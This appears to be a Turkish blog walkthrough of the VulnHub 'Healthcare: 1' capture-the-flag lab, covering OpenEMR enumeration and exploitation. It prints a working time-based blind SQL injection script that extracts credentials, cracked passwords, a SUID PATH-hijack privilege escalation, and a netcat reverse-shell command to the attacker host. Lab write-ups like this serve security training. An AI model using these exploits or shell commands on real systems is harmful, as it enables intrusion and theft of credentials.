{"id":1281,"date":"2021-06-30T20:42:01","date_gmt":"2021-06-30T20:42:01","guid":{"rendered":"http:\/\/144.76.171.171\/blog\/?p=1281"},"modified":"2021-06-30T20:42:01","modified_gmt":"2021-06-30T20:42:01","slug":"healthcare-1","status":"publish","type":"post","link":"https:\/\/berenkudaygorun.com\/blog\/blog\/2021\/06\/30\/healthcare-1\/","title":{"rendered":"HEALTHCARE: 1"},"content":{"rendered":"<h2>Makine Hakk\u0131nda Bilgiler<\/h2>\n<p><strong>A\u00e7\u0131klama:<\/strong><br \/>\nLevel: Intermediate<\/p>\n<p>Description:This machine was developed to train the student to think according to the OSCP methodology. Pay attention to each step, because if you lose something you will not reach the goal: to become root in the system.<\/p>\n<p>It is boot2root, tested on VirtualBox (but works on VMWare) and has two flags: user.txt and root.txt.<\/p>\n<p><strong>Vulnhub Sayfas\u0131:<\/strong><br \/>\n<a href=\"https:\/\/www.vulnhub.com\/entry\/healthcare-1,522\/\">https:\/\/www.vulnhub.com\/entry\/healthcare-1,522\/<\/a><\/p>\n<p><strong>\u0130ndirme Sayfas\u0131:<\/strong><br \/>\n<a href=\"https:\/\/download.vulnhub.com\/healthcare\/Healthcare.ova\">https:\/\/download.vulnhub.com\/healthcare\/Healthcare.ova<\/a><\/p>\n<h2>Walkthrough<\/h2>\n<p>Makineyi tespit ederek ba\u015flayal\u0131m.<\/p>\n<pre><code class=\"language-sh\">\u250c\u2500\u2500(root&#x1f480;kali)-[~]\n\u2514\u2500# ifconfig eth0\neth0: flags=4163&lt;UP,BROADCAST,RUNNING,MULTICAST&gt;  mtu 1500\n        inet 192.168.31.108  netmask 255.255.255.0  broadcast 192.168.31.255\n        inet6 fe80::a00:27ff:fe8b:5efb  prefixlen 64  scopeid 0x20&lt;link&gt;\n        ether 08:00:27:8b:5e:fb  txqueuelen 1000  (Ethernet)\n        RX packets 960  bytes 75877 (74.0 KiB)\n        RX errors 0  dropped 0  overruns 0  frame 0\n        TX packets 19431  bytes 1174170 (1.1 MiB)\n        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0\n\n\u250c\u2500\u2500(root&#x1f480;kali)-[~]\n\u2514\u2500# arp-scan -l | grep 9f\n192.168.31.140  08:00:27:61:53:9f   PCS Systemtechnik GmbH\n<\/code><\/pre>\n<p>nmap taramas\u0131 ile devam edelim.<\/p>\n<pre><code class=\"language-sh\">[*] Scan: 1239\nStarting Nmap 7.91 ( https:\/\/nmap.org ) at 2021-06-30 16:22 EDT\nNmap scan report for symfonos.local (192.168.31.140)\nHost is up (0.00024s latency).\nNot shown: 65533 closed ports\nPORT   STATE SERVICE VERSION\n21\/tcp open  ftp     ProFTPD 1.3.3d\n80\/tcp open  http    Apache httpd 2.2.17 ((PCLinuxOS 2011\/PREFORK-1pclos2011))\n| http-robots.txt: 8 disallowed entries \n| \/manual\/ \/manual-2.2\/ \/addon-modules\/ \/doc\/ \/images\/ \n|_\/all_our_e-mail_addresses \/admin\/ \/\n|_http-server-header: Apache\/2.2.17 (PCLinuxOS 2011\/PREFORK-1pclos2011)\n|_http-title: Coming Soon 2\nMAC Address: 08:00:27:61:53:9F (Oracle VirtualBox virtual NIC)\nNo exact OS matches for host (If you know what OS is running on it, see https:\/\/nmap.org\/submit\/ ).\nTCP\/IP fingerprint:\nOS:SCAN(V=7.91%E=4%D=6\/30%OT=21%CT=1%CU=34692%PV=Y%DS=1%DC=D%G=Y%M=080027%T\nOS:M=60DCD297%P=x86_64-pc-linux-gnu)SEQ(SP=CB%GCD=1%ISR=D2%TI=Z%CI=Z%II=I%T\nOS:S=A)OPS(O1=M5B4ST11NW6%O2=M5B4ST11NW6%O3=M5B4NNT11NW6%O4=M5B4ST11NW6%O5=\nOS:M5B4ST11NW6%O6=M5B4ST11)WIN(W1=3890%W2=3890%W3=3890%W4=3890%W5=3890%W6=3\nOS:890)ECN(R=Y%DF=Y%T=40%W=3908%O=M5B4NNSNW6%CC=N%Q=)T1(R=Y%DF=Y%T=40%S=O%A\nOS:=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=Y%DF=Y%T=40%W=3890%S=O%A=S+%F=AS%O=M5B4ST11\nOS:NW6%RD=0%Q=)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R=Y%DF=Y%T=40\nOS:%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q\nOS:=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%T=40%IPL=164\nOS:%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD=S)\n\nNetwork Distance: 1 hop\nService Info: OS: Unix\n\nTRACEROUTE\nHOP RTT     ADDRESS\n1   0.24 ms symfonos.local (192.168.31.140)\n\nOS and Service detection performed. Please report any incorrect results at https:\/\/nmap.org\/submit\/ .\nNmap done: 1 IP address (1 host up) scanned in 21.68 seconds\n<\/code><\/pre>\n<p>Nikto \u00e7\u0131kt\u0131s\u0131n\u0131 payla\u015fmayaca\u011f\u0131m \u00e7\u00fcnk\u00fc beni \u00e7ok yan\u0131lt\u0131 shellshock oldu\u011funu d\u00fc\u015f\u00fcnm\u00fc\u015ft\u00fcm uzun bir s\u00fcrem shellshock ile ge\u00e7ti. A\u015fa\u011f\u0131da gobuster \u00e7\u0131kt\u0131s\u0131 bulunmaktad\u0131r.<\/p>\n<pre><code class=\"language-sh\">\u250c\u2500\u2500(root&#x1f480;kali)-[~]\n\u2514\u2500# gobuster dir --url http:\/\/192.168.31.140\/  --follow-redirect --status-codes-blacklist &quot;404&quot; --no-error --threads 70 --wordlist \/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-big.txt -x php,html,sql,zip,bak,sql,txt,php5,py,rar,7z,log --expanded  --add-slash\n\n===============================================================\nGobuster v3.1.0\nby OJ Reeves (@TheColonial) &amp; Christian Mehlmauer (@firefart)\n===============================================================\n[+] Url:                     http:\/\/192.168.31.140\/\n[+] Method:                  GET\n[+] Threads:                 70\n[+] Wordlist:                \/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-big.txt\n[+] Negative Status codes:   404\n[+] User Agent:              gobuster\/3.1.0\n[+] Extensions:              html,sql,7z,rar,log,php,zip,bak,txt,php5,py\n[+] Add Slash:               true\n[+] Follow Redirect:         true\n[+] Expanded:                true\n[+] Timeout:                 10s\n===============================================================\n2021\/06\/30 16:24:33 Starting gobuster in directory enumeration mode\n===============================================================\nhttp:\/\/192.168.31.140\/images\/              (Status: 403) [Size: 1014]\nhttp:\/\/192.168.31.140\/index.html           (Status: 200) [Size: 5031]\nhttp:\/\/192.168.31.140\/icons\/               (Status: 403) [Size: 1014]\nhttp:\/\/192.168.31.140\/css\/                 (Status: 403) [Size: 1014]\nhttp:\/\/192.168.31.140\/cgi-bin\/             (Status: 403) [Size: 1014]\nhttp:\/\/192.168.31.140\/js\/                  (Status: 403) [Size: 1014]\nhttp:\/\/192.168.31.140\/vendor\/              (Status: 403) [Size: 1014]\nhttp:\/\/192.168.31.140\/robots.txt           (Status: 200) [Size: 620] \nhttp:\/\/192.168.31.140\/error\/               (Status: 403) [Size: 1014]\nhttp:\/\/192.168.31.140\/fonts\/               (Status: 403) [Size: 1014]\nhttp:\/\/192.168.31.140\/gitweb\/              (Status: 403) [Size: 1014]\nhttp:\/\/192.168.31.140\/openemr\/              (Status: 200) [Size: 5196]<\/code><\/pre>\n<p>nmap \u00e7\u0131kt\u0131s\u0131nda robots.txt bulundu ancak burdaki robots.txt'de de tav\u015fan deli\u011fi... gobuster sonu\u00e7lar\u0131nda <strong><a href=\"http:\/\/192.168.31.140\/openemr\">http:\/\/192.168.31.140\/openemr<\/a><\/strong> sonucunu buldum ve buraya gitti\u011fimde bir login sayfas\u0131 ile kar\u015f\u0131la\u015ft\u0131m. Sqli denemeleri yapt\u0131m ancak ba\u015far\u0131l\u0131 olamad\u0131m. searchsploit'de aramalar yapt\u0131\u011f\u0131mda bana burada sqli oldu\u011funu s\u00f6yl\u00fcyordu. Kendim bulmaktansa ilgili python kodunu \u00e7al\u0131\u015ft\u0131rd\u0131m ve kullan\u0131c\u0131 bilgilerini elde ettim.<\/p>\n<pre><code class=\"language-sh\">\n\u250c\u2500\u2500(root&#x1f480;kali)-[~]\n\u2514\u2500# searchsploit OpenEMR 4.1.0\n------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------ ---------------------------------\n Exploit Title                                                                                                                                                                                              |  Path\n------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------ ---------------------------------\nOpenEMR 4.1.0 - &#039;u&#039; SQL Injection                                                                                                                                                                           | php\/webapps\/49742.py\nOpenemr-4.1.0 - SQL Injection                                                                                                                                                                               | php\/webapps\/17998.txt\n------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------ ---------------------------------\nShellcodes: No Results\nPapers: No Results\n\n\u250c\u2500\u2500(root&#x1f480;kali)-[~]\n\u2514\u2500# cat $(locate php\/webapps\/17998.txt)                                            \n# Exploit Title: [Openemr-4.1.0 SQL injection Vulnerability]\n# Date: [2011\/10\/18]\n# Author: [I2sec-dae jin Oh]\n# Software Link: [http:\/\/sourceforge.net\/projects\/openemr\/files\/OpenEMR%20Current\/4.1.0\/openemr-4.1.0.zip\/download]\n# Vendor : www.open-emr.com\n# Version: [Openemr-4.1.0]\n# Tested on: [Windows 7]\n---------------------------------------\nsource of : \/interface\/patient_file\/summary\/add_edit_issue.php:\n\n$irow = array();\nif ($issue)\n$irow = sqlQuery(&quot;SELECT * FROM lists WHERE id = $issue&quot;);; &lt;--------------------- SQL injection\nelse if ($thistype)\n$irow[&#039;type&#039;] = $thistype\nproof of concept:\nhttp:\/\/[attack url]\/interface\/patient_file\/summary\/add_edit_issue.php?issue=0+union\n+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,user(),25,26,27--                                                                                                                                                                                                                                              \n\u250c\u2500\u2500(root&#x1f480;kali)-[~]\n\u2514\u2500# cat $(locate php\/webapps\/49742.py) \n# Exploit Title: OpenEMR 4.1.0 - &#039;u&#039; SQL Injection\n# Date: 2021-04-03\n# Exploit Author: Michael Ikua\n# Vendor Homepage: https:\/\/www.open-emr.org\/\n# Software Link: https:\/\/github.com\/openemr\/openemr\/archive\/refs\/tags\/v4_1_0.zip\n# Version: 4.1.0\n# Original Advisory: https:\/\/www.netsparker.com\/web-applications-advisories\/sql-injection-vulnerability-in-openemr\/\n\n#!\/usr\/bin\/env python3\n\nimport requests\nimport string\nimport sys\n\nprint(&quot;&quot;&quot;\n   ____                   ________  _______     __ __   ___ ____ \n  \/ __ \\____  ___  ____  \/ ____\/  |\/  \/ __ \\   \/ \/\/ \/  &lt;  \/\/ __ \\\\\n \/ \/ \/ \/ __ \\\/ _ \\\/ __ \\\/ __\/ \/ \/|_\/ \/ \/_\/ \/  \/ \/\/ \/_  \/ \/\/ \/ \/ \/\n\/ \/_\/ \/ \/_\/ \/  __\/ \/ \/ \/ \/___\/ \/  \/ \/ _, _\/  \/__  __\/ \/ \/\/ \/_\/ \/ \n\\____\/ .___\/\\___\/_\/ \/_\/_____\/_\/  \/_\/_\/ |_|     \/_\/ (_)_(_)____\/  \n    \/_\/\n    ____  ___           __   _____ ____    __    _               \n   \/ __ )\/ (_)___  ____\/ \/  \/ ___\/\/ __ \\  \/ \/   (_)              \n  \/ \/_\/ \/ \/ \/ __ \\\/ __  \/   \\__ \\\/ \/ \/ \/ \/ \/   \/ \/               \n \/ \/_\/ \/ \/ \/ \/ \/ \/ \/_\/ \/   ___\/ \/ \/_\/ \/ \/ \/___\/ \/                \n\/_____\/_\/_\/_\/ \/_\/\\__,_\/   \/____\/\\___\\_\\\/_____\/_\/   exploit by @ikuamike \n&quot;&quot;&quot;)\n\nall = string.printable\n# edit url to point to your openemr instance\nurl = &quot;http:\/\/192.168.56.106\/openemr\/interface\/login\/validateUser.php?u=&quot; \n\ndef extract_users_num():\n    print(&quot;[+] Finding number of users...&quot;)\n    for n in range(1,100):\n        payload = &#039;\\&#039;%2b(SELECT+if((select count(username) from users)=&#039; + str(n) + &#039;,sleep(3),1))%2b\\&#039;&#039;\n        r = requests.get(url+payload)\n        if r.elapsed.total_seconds() &gt; 3:\n            user_length = n\n            break\n    print(&quot;[+] Found number of users: &quot; + str(user_length))\n    return user_length\n\ndef extract_users():\n    users = extract_users_num()\n    print(&quot;[+] Extracting username and password hash...&quot;)\n    output = []\n    for n in range(1,1000):\n        payload = &#039;\\&#039;%2b(SELECT+if(length((select+group_concat(username,\\&#039;:\\&#039;,password)+from+users+limit+0,1))=&#039; + str(n) + &#039;,sleep(3),1))%2b\\&#039;&#039;\n        #print(payload)\n        r = requests.get(url+payload)\n        #print(r.request.url)\n        if r.elapsed.total_seconds() &gt; 3:\n            length = n\n            break\n    for i in range(1,length+1):\n        for char in all:\n            payload = &#039;\\&#039;%2b(SELECT+if(ascii(substr((select+group_concat(username,\\&#039;:\\&#039;,password)+from+users+limit+0,1),&#039;+ str(i)+&#039;,1))=&#039;+str(ord(char))+&#039;,sleep(3),1))%2b\\&#039;&#039;\n            #print(payload)\n            r = requests.get(url+payload)\n            #print(r.request.url)\n            if r.elapsed.total_seconds() &gt; 3:\n                output.append(char)\n                if char == &quot;,&quot;:\n                    print(&quot;&quot;)\n                    continue\n                print(char, end=&#039;&#039;, flush=True)\n\ntry:\n    extract_users()\nexcept KeyboardInterrupt:\n    print(&quot;&quot;)\n    print(&quot;[+] Exiting...&quot;)\n    sys.exit()                      <\/code><\/pre>\n<p>Python kodunu okudu\u011fumuzda ilgili url'yi de\u011fi\u015fitirmemizin yeterli oldu\u011funu g\u00f6rebiliyoruz.<\/p>\n<pre><code class=\"language-sh\">\u250c\u2500\u2500(root&#x1f480;kali)-[~\/oscp\/healt]\n\u2514\u2500# python3 49742.py                                                                                           \n\n   ____                   ________  _______     __ __   ___ ____ \n  \/ __ \\____  ___  ____  \/ ____\/  |\/  \/ __ \\   \/ \/\/ \/  &lt;  \/\/ __ \\\n \/ \/ \/ \/ __ \\\/ _ \\\/ __ \\\/ __\/ \/ \/|_\/ \/ \/_\/ \/  \/ \/\/ \/_  \/ \/\/ \/ \/ \/\n\/ \/_\/ \/ \/_\/ \/  __\/ \/ \/ \/ \/___\/ \/  \/ \/ _, _\/  \/__  __\/ \/ \/\/ \/_\/ \/ \n\\____\/ .___\/\\___\/_\/ \/_\/_____\/_\/  \/_\/_\/ |_|     \/_\/ (_)_(_)____\/  \n    \/_\/\n    ____  ___           __   _____ ____    __    _               \n   \/ __ )\/ (_)___  ____\/ \/  \/ ___\/\/ __ \\  \/ \/   (_)              \n  \/ \/_\/ \/ \/ \/ __ \\\/ __  \/   \\__ \\\/ \/ \/ \/ \/ \/   \/ \/               \n \/ \/_\/ \/ \/ \/ \/ \/ \/ \/_\/ \/   ___\/ \/ \/_\/ \/ \/ \/___\/ \/                \n\/_____\/_\/_\/_\/ \/_\/\\__,_\/   \/____\/\\___\\_\\\/_____\/_\/   exploit by @ikuamike \n\n[+] Finding number of users...\n[+] Found number of users: 2\n[+] Extracting username and password hash...\nadmin:3863efef9ee2bfbc51ecdca359c6302bed1389e8\nmedical:ab24aed5a7c4ad45615cd7e0da816eea39e4895d    <\/code><\/pre>\n<p>Harika! Kullan\u0131c\u0131 bilgilerini elde ettik.<\/p>\n<pre><code>admin:ackbar\nmedical:medical<\/code><\/pre>\n<p>Bu bilgilerle web uygulamas\u0131 i\u00e7erisine girebiliyoruz. \u0130\u00e7ine girdikten sonra biraz ara\u015ft\u0131rd\u0131m ve php kodlar\u0131 yazabildi\u011fim bir alan buldum. Biraz ara\u015ft\u0131r\u0131n bu k\u0131sm\u0131 size b\u0131rak\u0131yorum \ud83d\ude42<\/p>\n<p>php kodlar\u0131n\u0131n oldu\u011fu yere php reverse shell'imi bast\u0131m. B\u00f6ylece apache kullan\u0131c\u0131s\u0131 olarak reverse ald\u0131m...<\/p>\n<pre><code class=\"language-sh\">sh-4.1$ id     \nid\nuid=479(apache) gid=416(apache) groups=416(apache)\nsh-4.1$ \n<\/code><\/pre>\n<p>Her zaman kulland\u0131\u011f\u0131m lse.sh'\u0131 kulland\u0131m. Burada \/var\/backups klas\u00f6r\u00fc alt\u0131nda <strong>shadow<\/strong> dosyas\u0131 bulunuyordu. John ile kullan\u0131c\u0131lar\u0131 k\u0131rd\u0131m.<\/p>\n<pre><code class=\"language-sh\">\u250c\u2500\u2500(root&#x1f480;kali)-[~\/oscp\/healt]\n\u2514\u2500# john hash                       \nUsing default input encoding: UTF-8\nLoaded 3 password hashes with 3 different salts (bcrypt [Blowfish 32\/64 X3])\nCost 1 (iteration count) is 256 for all loaded hashes\nWill run 2 OpenMP threads\nProceeding with single, rules:Single\nPress &#039;q&#039; or Ctrl-C to abort, almost any other key for status\nmedical          (medical)\nWarning: Only 7 candidates buffered for the current salt, minimum 8 needed for performance.\nWarning: Only 6 candidates buffered for the current salt, minimum 8 needed for performance.\nWarning: Only 3 candidates buffered for the current salt, minimum 8 needed for performance.\nWarning: Only 4 candidates buffered for the current salt, minimum 8 needed for performance.\nWarning: Only 2 candidates buffered for the current salt, minimum 8 needed for performance.\nWarning: Only 7 candidates buffered for the current salt, minimum 8 needed for performance.\nWarning: Only 1 candidate buffered for the current salt, minimum 8 needed for performance.\nWarning: Only 2 candidates buffered for the current salt, minimum 8 needed for performance.\nWarning: Only 4 candidates buffered for the current salt, minimum 8 needed for performance.\nAlmost done: Processing the remaining buffered candidate passwords, if any.\nWarning: Only 2 candidates buffered for the current salt, minimum 8 needed for performance.\nFurther messages of this type will be suppressed.\nTo see less of these warnings, enable &#039;RelaxKPCWarningCheck&#039; in john.conf\nProceeding with wordlist:\/usr\/share\/john\/password.lst, rules:Wordlist\nskywalker        (almirant)\nProceeding with incremental:ASCII\n<\/code><\/pre>\n<p>\u0130lgin\u00e7 bir nokta. Buradan direkt root olabiliriz ama ben kullan\u0131c\u0131lara z\u0131plad\u0131m onlarla da ara\u015ft\u0131rmalar yapt\u0131m. \u015eimdi kolay bir \u015fekilde nas\u0131l root olabilece\u011fimizi g\u00f6sterece\u011fim.<\/p>\n<p>apache kullan\u0131c\u0131s\u0131yken lse.sh \u00e7\u0131kt\u0131lar\u0131n\u0131 okudu\u011fumda \u00e7ok fazla suid biti etkin edilmi\u015f binary dosya bulunuyordu. Asl\u0131nda healthcheck bana \u00e7ok tan\u0131d\u0131k gelmi\u015fti ama nedense bakmad\u0131m. \u00c7ook zonra bakmay\u0131 d\u00fc\u015f\u00fcnd\u00fcm.<\/p>\n<pre><code>--\n[!] fst020 Uncommon setuid binaries........................................ yes!\n---\n\/usr\/lib\/ssh\/ssh-keysign\n\/usr\/lib\/polkit-resolve-exe-helper\n\/usr\/lib\/polkit-grant-helper-pam\n\/usr\/lib\/polkit-set-default-helper\n\/usr\/sbin\/fileshareset\n\/usr\/sbin\/traceroute6\n\/usr\/bin\/pumount\n\/usr\/bin\/batch\n\/usr\/bin\/wvdial\n\/usr\/bin\/pmount\n\/usr\/bin\/sperl5.10.1\n\/usr\/bin\/gpgsm\n\/usr\/bin\/gpg\n\/usr\/bin\/healthcheck\n\/usr\/bin\/Xwrapper\n\/usr\/bin\/ping6\n\/lib\/dbus-1\/dbus-daemon-launch-helper\n\/tmp\/lse.sh\n---<\/code><\/pre>\n<p><strong>healthcheck<\/strong> uygulamas\u0131n\u0131 \u00e7al\u0131\u015ft\u0131rd\u0131\u011f\u0131m\u0131zda a\u015fa\u011f\u0131daki gibi bir \u00e7\u0131kt\u0131 al\u0131yoruz.<\/p>\n<pre><code class=\"language-sh\">sh-4.1$ healthcheck\nhealthcheck\nTERM environment variable not set.\nSystem Health Check\n\nScanning System\neth2      Link encap:Ethernet  HWaddr 08:00:27:61:53:9F  \n          inet addr:192.168.31.140  Bcast:192.168.31.255  Mask:255.255.255.0\n          inet6 addr: fe80::a00:27ff:fe61:539f\/64 Scope:Link\n          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1\n          RX packets:16720601 errors:0 dropped:0 overruns:0 frame:0\n          TX packets:16920731 errors:0 dropped:0 overruns:0 carrier:0\n          collisions:0 txqueuelen:1000 \n          RX bytes:1060130134 (1011.0 MiB)  TX bytes:1694217149 (1.5 GiB)\n\nlo        Link encap:Local Loopback  \n          inet addr:127.0.0.1  Mask:255.0.0.0\n          inet6 addr: ::1\/128 Scope:Host\n          UP LOOPBACK RUNNING  MTU:16436  Metric:1\n          RX packets:179 errors:0 dropped:0 overruns:0 frame:0\n          TX packets:179 errors:0 dropped:0 overruns:0 carrier:0\n          collisions:0 txqueuelen:0 \n          RX bytes:19039 (18.5 KiB)  TX bytes:19039 (18.5 KiB)\n\nDisk \/dev\/sda: 10.7 GB, 10737418240 bytes\n255 heads, 63 sectors\/track, 1305 cylinders, total 20971520 sectors\nUnits = sectors of 1 * 512 = 512 bytes\nSector size (logical\/physical): 512 bytes \/ 512 bytes\nI\/O size (minimum\/optimal): 512 bytes \/ 512 bytes\nDisk identifier: 0x00000000\n\n   Device Boot      Start         End      Blocks   Id  System\n\/dev\/sda1   *          63    18876374     9438156   83  Linux\n\/dev\/sda2        18876375    20964824     1044225    5  Extended\n\/dev\/sda5        18876438    20964824     1044193+  82  Linux swap \/ Solaris\n4.0K    .\/gpg-ycbRQr\n4.0K    .\/gpg-WOAttn\n4.0K    .\/gpg-HVF7hc\n4.0K    .\/gpg-Ev8G59\n4.0K    .\/.ICE-unix\n4.0K    .\/.X11-unix\n6.3M    .\n<\/code><\/pre>\n<p>\u00c7\u0131kt\u0131lar \u00e7ok tan\u0131d\u0131k mesela <strong>ifconfig<\/strong> gibi. Bunu g\u00f6r\u00fcnce <strong>PATH<\/strong> manip\u00fclasyonu yapmay\u0131 d\u00fc\u015f\u00fcnd\u00fcm.<\/p>\n<pre><code class=\"language-sh\">[almirant@localhost tmp]$ strings \/usr\/bin\/healthcheck\nstrings \/usr\/bin\/healthcheck\n\/lib\/ld-linux.so.2\n__gmon_start__\nlibc.so.6\n_IO_stdin_used\nsetuid\nsystem\nsetgid\n__libc_start_main\nGLIBC_2.0\nPTRhp\n[^_]\nclear ; echo &#039;System Health Check&#039; ; echo &#039;&#039; ; echo &#039;Scanning System&#039; ; sleep 2 ; ifconfig ; fdisk -l ; du -h<\/code><\/pre>\n<p>Kodun i\u00e7erisinde a\u00e7\u0131k bir \u015fekilde ifconfig oldu\u011funu g\u00f6rebiliyoruz.<\/p>\n<pre><code class=\"language-sh\">\n[almirant@localhost tmp]$ echo id &gt; ifconfig\necho id &gt; ifconfig\n[almirant@localhost tmp]$ chmod 777 ifconfig\nchmod 777 ifconfig\n[almirant@localhost tmp]$ cat ifconfig\ncat ifconfig\nid\n<\/code><\/pre>\n<pre><code class=\"language-sh\">[almirant@localhost tmp]$ export PATH=\/tmp:$PATH\nexport PATH=\/tmp:$PATH\n[almirant@localhost tmp]$ echo $PATH\necho $PATH\n\/tmp:\/sbin:\/usr\/sbin:\/bin:\/usr\/bin:\/usr\/lib\/qt4\/bin<\/code><\/pre>\n<pre><code class=\"language-sh\">[almirant@localhost tmp]$ healthcheck\nhealthcheck\nTERM environment variable not set.\nSystem Health Check\n\nScanning System\nuid=0(root) gid=0(root) groups=0(root),7(lp),19(floppy),22(cdrom),80(cdwriter),81(audio),82(video),83(dialout),100(users),490(polkituser),502(almirant)\n\nDisk \/dev\/sda: 10.7 GB, 10737418240 bytes\n255 heads, 63 sectors\/track, 1305 cylinders, total 20971520 sectors\nUnits = sectors of 1 * 512 = 512 bytes\nSector size (logical\/physical): 512 bytes \/ 512 bytes\nI\/O size (minimum\/optimal): 512 bytes \/ 512 bytes\nDisk identifier: 0x00000000\n\n   Device Boot      Start         End      Blocks   Id  System\n\/dev\/sda1   *          63    18876374     9438156   83  Linux\n\/dev\/sda2        18876375    20964824     1044225    5  Extended\n\/dev\/sda5        18876438    20964824     1044193+  82  Linux swap \/ Solaris\n4.0K    .\/gpg-ycbRQr\n4.0K    .\/gpg-WOAttn\n4.0K    .\/gpg-HVF7hc\n4.0K    .\/gpg-Ev8G59\n4.0K    .\/.ICE-unix\n4.0K    .\/.X11-unix\n6.3M    .<\/code><\/pre>\n<p>Harika! \u015eimdi reverse alal\u0131m.<\/p>\n<pre><code class=\"language-sh\">[almirant@localhost tmp]$ echo &quot;nc 192.168.31.108 1822 -e \/bin\/bash&quot; &gt; ifconfig\n&lt;cho &quot;nc 192.168.31.108 1822 -e \/bin\/bash&quot; &gt; ifconfig                        \n[almirant@localhost tmp]$ cat ifconfig\ncat ifconfig\nnc 192.168.31.108 1822 -e \/bin\/bash\n[almirant@localhost tmp]$ \n\n[almirant@localhost tmp]$ healthcheck\nhealthcheck\nTERM environment variable not set.\nSystem Health Check\n\nScanning System\n<\/code><\/pre>\n<pre><code class=\"language-sh\">\u250c\u2500\u2500(root&#x1f480;kali)-[~\/oscp\/healt]\n\u2514\u2500# nc -lvp 1822            \nlistening on [any] 1822 ...\nconnect to [192.168.31.108] from symfonos.local [192.168.31.140] 50926\nid\nuid=0(root) gid=0(root) groups=0(root),7(lp),19(floppy),22(cdrom),80(cdwriter),81(audio),82(video),83(dialout),100(users),490(polkituser),502(almirant)\n\ncd \/root\nls\nDesktop\nDocuments\ndrakx\nhealthcheck\nhealthcheck.c\nroot.txt\nsudo.rpm\ntmp\ncat root.txt\n\u2588\u2588\u2001   \u2588\u2588\u2001 \u2588\u2588\u2588\u2588\u2588\u2588\u2001 \u2588\u2588\u2001   \u2588\u2588\u2001    \u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2001\u2588\u2588\u2588\u2588\u2588\u2588\u2001 \u2588\u2588\u2001\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2001\u2588\u2588\u2588\u2588\u2588\u2588\u2001     \u2588\u2588\u2001  \u2588\u2588\u2001 \u2588\u2588\u2588\u2588\u2588\u2001 \u2588\u2588\u2588\u2588\u2588\u2588\u2001 \u2588\u2588\u2588\u2588\u2588\u2588\u2001 \u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2001\u2588\u2588\u2588\u2588\u2588\u2588\u2001 \u2588\u2588\u2001\n\u2001\u2588\u2588\u2001 \u2588\u2588\u2001\u2001\u2588\u2588\u2001\u2001\u2001\u2001\u2588\u2588\u2001\u2588\u2588\u2001   \u2588\u2588\u2001    \u2001\u2001\u2001\u2588\u2588\u2001\u2001\u2001\u2001\u2588\u2588\u2001\u2001\u2001\u2588\u2588\u2001\u2588\u2588\u2001\u2588\u2588\u2001\u2001\u2001\u2001\u2001\u2001\u2588\u2588\u2001\u2001\u2001\u2588\u2588\u2001    \u2588\u2588\u2001  \u2588\u2588\u2001\u2588\u2588\u2001\u2001\u2001\u2588\u2588\u2001\u2588\u2588\u2001\u2001\u2001\u2588\u2588\u2001\u2588\u2588\u2001\u2001\u2001\u2588\u2588\u2001\u2588\u2588\u2001\u2001\u2001\u2001\u2001\u2001\u2588\u2588\u2001\u2001\u2001\u2588\u2588\u2001\u2588\u2588\u2001\n \u2001\u2588\u2588\u2588\u2588\u2001\u2001 \u2588\u2588\u2001   \u2588\u2588\u2001\u2588\u2588\u2001   \u2588\u2588\u2001       \u2588\u2588\u2001   \u2588\u2588\u2588\u2588\u2588\u2588\u2001\u2001\u2588\u2588\u2001\u2588\u2588\u2588\u2588\u2588\u2001  \u2588\u2588\u2001  \u2588\u2588\u2001    \u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2001\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2001\u2588\u2588\u2588\u2588\u2588\u2588\u2001\u2001\u2588\u2588\u2001  \u2588\u2588\u2001\u2588\u2588\u2588\u2588\u2588\u2001  \u2588\u2588\u2588\u2588\u2588\u2588\u2001\u2001\u2588\u2588\u2001\n  \u2001\u2588\u2588\u2001\u2001  \u2588\u2588\u2001   \u2588\u2588\u2001\u2588\u2588\u2001   \u2588\u2588\u2001       \u2588\u2588\u2001   \u2588\u2588\u2001\u2001\u2001\u2588\u2588\u2001\u2588\u2588\u2001\u2588\u2588\u2001\u2001\u2001\u2001  \u2588\u2588\u2001  \u2588\u2588\u2001    \u2588\u2588\u2001\u2001\u2001\u2588\u2588\u2001\u2588\u2588\u2001\u2001\u2001\u2588\u2588\u2001\u2588\u2588\u2001\u2001\u2001\u2588\u2588\u2001\u2588\u2588\u2001  \u2588\u2588\u2001\u2588\u2588\u2001\u2001\u2001\u2001  \u2588\u2588\u2001\u2001\u2001\u2588\u2588\u2001\u2001\u2001\u2001\n   \u2588\u2588\u2001   \u2001\u2588\u2588\u2588\u2588\u2588\u2588\u2001\u2001\u2001\u2588\u2588\u2588\u2588\u2588\u2588\u2001\u2001       \u2588\u2588\u2001   \u2588\u2588\u2001  \u2588\u2588\u2001\u2588\u2588\u2001\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2001\u2588\u2588\u2588\u2588\u2588\u2588\u2001\u2001    \u2588\u2588\u2001  \u2588\u2588\u2001\u2588\u2588\u2001  \u2588\u2588\u2001\u2588\u2588\u2001  \u2588\u2588\u2001\u2588\u2588\u2588\u2588\u2588\u2588\u2001\u2001\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2001\u2588\u2588\u2001  \u2588\u2588\u2001\u2588\u2588\u2001\n   \u2001\u2001\u2001    \u2001\u2001\u2001\u2001\u2001\u2001\u2001  \u2001\u2001\u2001\u2001\u2001\u2001\u2001        \u2001\u2001\u2001   \u2001\u2001\u2001  